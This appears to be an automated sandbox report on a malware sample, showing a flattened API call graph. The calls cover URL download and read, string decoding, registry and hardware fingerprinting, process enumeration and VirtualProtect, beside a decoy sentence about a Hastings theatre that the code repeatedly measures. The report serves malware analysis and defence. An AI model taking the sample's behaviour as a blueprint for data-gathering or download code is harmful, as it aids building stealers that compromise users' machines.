66309->64726 66989 276aad0 66310->66989 66312 2755009 InternetOpenUrlA 66317 2755021 66312->66317 66313 27550a0 InternetCloseHandle InternetCloseHandle 66314 275502a InternetReadFile 66314->66317 66316 2755070 memcpy 66316->66317 66317->66313 66317->66314 66317->66316 66624 276a7a0 lstrcpy 66623->66624 66625 2751683 66624->66625 66626 276a7a0 lstrcpy 66625->66626 66627 2751695 66626->66627 66628 276a7a0 lstrcpy 66627->66628 66629 27516a7 66628->66629 66630 276a7a0 lstrcpy 66629->66630 66631 27515a3 66630->66631 66631->65557 66660 2751030 66632->66660 66636 2754838 lstrlen 66663 276aad0 66636->66663 66638 2754848 InternetCrackUrlA 66639 2754867 66638->66639 66639->65634 66641 276a740 lstrcpy 66640->66641 66642 2768b74 66641->66642 66643 276a740 lstrcpy 66642->66643 66644 2768b82 GetSystemTime 66643->66644 66646 2768b99 66644->66646 66645 276a7a0 lstrcpy 66647 2768bfc 66645->66647 66646->66645 66647->65649 66649 276a931 66648->66649 66650 276a988 66649->66650 66652 276a968 lstrcpy lstrcat 66649->66652 66651 276a7a0 lstrcpy 66650->66651 66653 276a994 66651->66653 66652->66650 66653->65652 66654->65767 66656 2759af9 LocalAlloc 66655->66656 66657 2754eee 66655->66657 66656->66657 66658 2759b14 CryptStringToBinaryA 66656->66658 66657->65655 66657->65657 66658->66657 66659 2759b39 LocalFree 66658->66659 66659->66657 66661 275103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 66660->66661 66662 276aad0 66661->66662 66662->66636 66663->66638 66664->65777 66665->65922 66666->65924 66667->65926 66668->65928 66669->65932 66670->65934 66671->65943 66672->65950 66673->65960 66802 27677a0 66674->66802 66677 27676c6 RegOpenKeyExA 66679 27676e7 RegQueryValueExA 66677->66679 66680 2767704 RegCloseKey 66677->66680 66678 2761c1e 66678->66025 66679->66680 66680->66678 66682 2761c99 66681->66682 66682->66039 66684 2761e09 66683->66684 66684->66081 66686 2761e84 66685->66686 66687 2767a9a wsprintfA 66685->66687 66686->66095 66687->66686 66689 2761efe 66688->66689 66690 2767b4d 66688->66690 66689->66109 66809 2768d20 LocalAlloc CharToOemW 66690->66809 66692 2767b59 66692->66689 66694 276a740 lstrcpy 66693->66694 66695 2767bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 66694->66695 66704 2767c25 66695->66704 66696 2767c46 GetLocaleInfoA 66696->66704 66697 2767d18 66698 2767d1e LocalFree 66697->66698 66699 2767d28 66697->66699 66698->66699 66700 276a7a0 lstrcpy 66699->66700 66703 2767d37 66700->66703 66701 276a9b0 lstrcpy lstrlen lstrcpy lstrcat 66701->66704 66702 276a8a0 lstrcpy 66702->66704 66703->66122 66704->66696 66704->66697 66704->66701 66704->66702 66706 2762008 66705->66706 66706->66137 66708 27694b5 66707->66708 66709 2769493 K32GetModuleFileNameExA CloseHandle 66707->66709 66710 276a740 lstrcpy 66708->66710 66709->66708 66711 2762091 66710->66711 66711->66152 66713 2762119 66712->66713 66714 2767e68 RegQueryValueExA 66712->66714 66713->66166 66715 2767e8e RegCloseKey 66714->66715 66715->66713 66717 2767fb9 GetLogicalProcessorInformationEx 66716->66717 66718 2767fd8 GetLastError 66717->66718 66719 2768029 66717->66719 66720 2768022 66718->66720 66728 2767fe3 66718->66728 66812 27689f0 GetProcessHeap HeapFree 66719->66812 66722 2762194 66720->66722 66813 27689f0 GetProcessHeap HeapFree 66720->66813 66722->66180 66726 276807b 66726->66720 66727 2768084 wsprintfA 66726->66727 66727->66722 66728->66717 66728->66722 66810 27689f0 GetProcessHeap HeapFree 66728->66810 66811 2768a10 GetProcessHeap RtlAllocateHeap 66728->66811 66730 276220f 66729->66730 66730->66194 66732 27689b0 66731->66732 66733 276814d GlobalMemoryStatusEx 66732->66733 66734 2768163 __aulldiv 66733->66734 66735 276819b wsprintfA 66734->66735 66736 2762289 66735->66736 66736->66208 66738 276a740 lstrcpy 66737->66738 66739 276230b 66738->66739 66739->66222 66741 276a740 lstrcpy 66740->66741 66746 2768229 66741->66746 66742 276823b EnumDisplayDevicesA 66743 2768263 66742->66743 66742->66746 66745 276a7a0 lstrcpy 66743->66745 66744 276a9b0 lstrcpy lstrlen lstrcpy lstrcat 66744->66746 66747 27682dc 66745->66747 66746->66742 66746->66744 66748 276a8a0 lstrcpy 66746->66748 66747->66239 66748->66746 66750 276a740 lstrcpy 66749->66750 66751 276835c RegOpenKeyExA 66750->66751 66752 27683d0 66751->66752 66753 27683ae 66751->66753 66755 2768613 RegCloseKey 66752->66755 66756 27683f8 RegEnumKeyExA 66752->66756 66754 276a7a0 lstrcpy 66753->66754 66765 27683bd 66754->66765 66757 276a7a0 lstrcpy 66755->66757 66758 276860e 66756->66758 66759 276843f wsprintfA RegOpenKeyExA 66756->66759 66757->66765 66758->66755 66760 2768485 RegCloseKey RegCloseKey 66759->66760 66761 27684c1 RegQueryValueExA 66759->66761 66762 276a7a0 lstrcpy 66760->66762 66763 2768601 RegCloseKey 66761->66763 66764 27684fa lstrlen 66761->66764 66762->66765 66763->66758 66764->66763 66766 2768510 66764->66766 66765->66265 66767 276a9b0 4 API calls 66766->66767 66768 2768527 66767->66768 66769 276a8a0 lstrcpy 66768->66769 66770 2768533 66769->66770 66771 276a9b0 4 API calls 66770->66771 66772 2768557 66771->66772 66773 276a8a0 lstrcpy 66772->66773 66774 2768563 66773->66774 66775 276856e RegQueryValueExA 66774->66775 66775->66763 66776 27685a3 66775->66776 66777 276a9b0 4 API calls 66776->66777 66778 27685ba 66777->66778 66779 276a8a0 lstrcpy 66778->66779 66780 27685c6 66779->66780 66781 276a9b0 4 API calls 66780->66781 66782 27685ea 66781->66782 66783 276a8a0 lstrcpy 66782->66783 66784 27685f6 66783->66784 66784->66763 66786 276a740 lstrcpy 66785->66786 66787 27686bc CreateToolhelp32Snapshot Process32First 66786->66787 66788 276875d CloseHandle 66787->66788 66789 27686e8 Process32Next 66787->66789 66790 276a7a0 lstrcpy 66788->66790 66789->66788 66794 27686fd 66789->66794 66793 2768776 66790->66793 66791 276a9b0 lstrcpy lstrlen lstrcpy lstrcat 66791->66794 66792 276a8a0 lstrcpy 66792->66794 66793->66297 66794->66789 66794->66791 66794->66792 66796 276a7a0 lstrcpy 66795->66796 66797 27651b5 66796->66797 66798 2751590 lstrcpy 66797->66798 66799 27651c6 66798->66799 66814 2755100 66799->66814 66801 27651cf 66801->66309 66805 2767720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 66802->66805 66804 27676b9 66804->66677 66804->66678 66806 2767765 RegQueryValueExA 66805->66806 66807 2767780 RegCloseKey 66805->66807 66806->66807 66808 2767793 66807->66808 66808->66804 66809->66692 66810->66728 66811->66728 66812->66726 66813->66722 66815 276a7a0 lstrcpy 66814->66815 66816 2755119 66815->66816 66817 27547b0 5 API calls 66816->66817 66818 2755125 66817->66818 66976 2768ea0 66818->66976 66820 2755184 66821 2755192 lstrlen 66820->66821 66822 27551a5 66821->66822 66823 2768ea0 4 API calls 66822->66823 66824 27551b6 66823->66824 66825 276a740 lstrcpy 66824->66825 66826 27551c9 66825->66826 66827 276a740 lstrcpy 66826->66827 66828 27551d6 66827->66828 66829 276a740 lstrcpy 66828->66829 66830 27551e3 66829->66830 66831 276a740 lstrcpy 66830->66831 66832 27551f0 66831->66832 66833 276a740 lstrcpy 66832->66833 66834 27551fd InternetOpenA StrCmpCA 66833->66834 66835 275522f 66834->66835 66836 27558c4 InternetCloseHandle 66835->66836 66837 2768b60 3 API calls 66835->66837 66843 27558d9 ctype 66836->66843 66838 275524e 66837->66838 66839 276a920 3 API calls 66838->66839 66840 2755261 66839->66840 66841 276a8a0 lstrcpy 66840->66841 66842 275526a 66841->66842 66844 276a9b0 4 API calls 66842->66844 66846 276a7a0 lstrcpy 66843->66846 66845 27552ab 66844->66845 66847 276a920 3 API calls 66845->66847 66854 2755913 66846->66854 66848 27552b2 66847->66848 66849 276a9b0 4 API calls 66848->66849 66850 27552b9 66849->66850 66851 276a8a0 lstrcpy 66850->66851 66852 27552c2 66851->66852 66854->66801 66977 2768ead CryptBinaryToStringA 66976->66977 66978 2768ea9 66976->66978 66977->66978 66979 2768ece GetProcessHeap RtlAllocateHeap 66977->66979 66978->66820 66979->66978 66980 2768ef4 ctype 66979->66980 66981 2768f05 CryptBinaryToStringA 66980->66981 66981->66978 66989->66312 68338 6c82b8ae 68339 6c82b8ba ___scrt_is_nonwritable_in_current_image 68338->68339 68340 6c82b8e3 dllmain_raw 68339->68340 68341 6c82b8de 68339->68341 68350 6c82b8c9 68339->68350 68342 6c82b8fd dllmain_crt_dispatch 68340->68342 68340->68350 68351 6c80bed0 DisableThreadLibraryCalls LoadLibraryExW 68341->68351 68342->68341 68342->68350 68344 6c82b91e 68345 6c82b94a 68344->68345 68352 6c80bed0 DisableThreadLibraryCalls LoadLibraryExW 68344->68352 68346 6c82b953 dllmain_crt_dispatch 68345->68346 68345->68350 68347 6c82b966 dllmain_raw 68346->68347 68346->68350 68347->68350 68349 6c82b936 dllmain_crt_dispatch dllmain_raw 68349->68345 68351->68344 68352->68349 68353 6c7f3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 68358 6c82ab2a 68353->68358 68357 6c7f30db 68362 6c82ae0c _crt_atexit _register_onexit_function 68358->68362 68360 6c7f30cd 68361 6c82b320 5 API calls ___raise_securityfailure 68360->68361 68361->68357 68362->68360 68363 6c7f35a0 68364 6c7f35c4 InitializeCriticalSectionAndSpinCount getenv 68363->68364 68379 6c7f3846 __aulldiv 68363->68379 68365 6c7f38fc strcmp 68364->68365 68376 6c7f35f3 __aulldiv 68364->68376 68369 6c7f3912 strcmp 68365->68369 68365->68376 68367 6c7f35f8 QueryPerformanceFrequency 68367->68376 68368 6c7f38f4 68369->68376 68370 6c7f3622 _strnicmp 68371 6c7f3944 _strnicmp 68370->68371 68370->68376 68373 6c7f395d 68371->68373 68371->68376 68372 6c7f376a QueryPerformanceCounter EnterCriticalSection 68375 6c7f37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 68372->68375 68377 6c7f375c 68372->68377 68374 6c7f3664 GetSystemTimeAdjustment 68374->68376 68375->68377 68378 6c7f37fc LeaveCriticalSection 68375->68378 68376->68367 68376->68370 68376->68371 68376->68373 68376->68374 68376->68377 68377->68372 68377->68375 68377->68378 68377->68379 68378->68377 68378->68379 68380 6c82b320 5 API calls ___raise_securityfailure 68379->68380 68380->68368

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 027545CC
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 027545D7
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 027545E2
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 027545ED
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 027545F8
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,027669FB), ref: 02754607
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,0000000F), ref: 0275460E
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 0275461C
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 02754627
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 02754632
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 0275463D
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 02754648
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 0275465C
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 02754667
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 02754672
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 0275467D
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,027669FB), ref: 02754688
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 027546B1
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 027546BC
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 027546C7
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 027546D2
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 027546DD
                                                                                                                                                      • strlen.MSVCRT ref: 027546F0
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 02754718
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 02754723
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0275472E
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 02754739
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 02754744
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 02754754
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0275475F
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0275476A
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 02754775
                                                                                                                                                      • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 02754780
                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0275479C
                                                                                                                                                      Strings
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027546D8
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027546CD
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754734
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754765
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0275471E
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0275477B
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027546C2
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027546AC
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0275466D
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754729
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0275473F
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754657
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754713
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027545E8
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0275474F
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0275475A
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754643
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754770
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754683
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754622
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027545DD
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027546B7
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027545D2
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027545F3
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754617
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0275462D
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754638
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 027545C7
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754662
                                                                                                                                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 02754678
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                                                                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                                                                                      • API String ID: 2127927946-2218711628
                                                                                                                                                      • Opcode ID: 7e2b58d7c1ae464b622d95ee245de771da5cd8bcdffd8ae58143d3fe488eaa4b
                                                                                                                                                      • Instruction ID: 7dc31b8d88e4b25c22ab0d2461b877cb5e2649e19b3f6bf1673113398280e915
                                                                                                                                                      • Opcode Fuzzy Hash: 7e2b58d7c1ae464b622d95ee245de771da5cd8bcdffd8ae58143d3fe488eaa4b
                                                                                                                                                      • Instruction Fuzzy Hash: F641BCB9A80304EBFB15AFE4E88DE9D7F75EB49606B60C864FD039D100D6B09521DB32

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
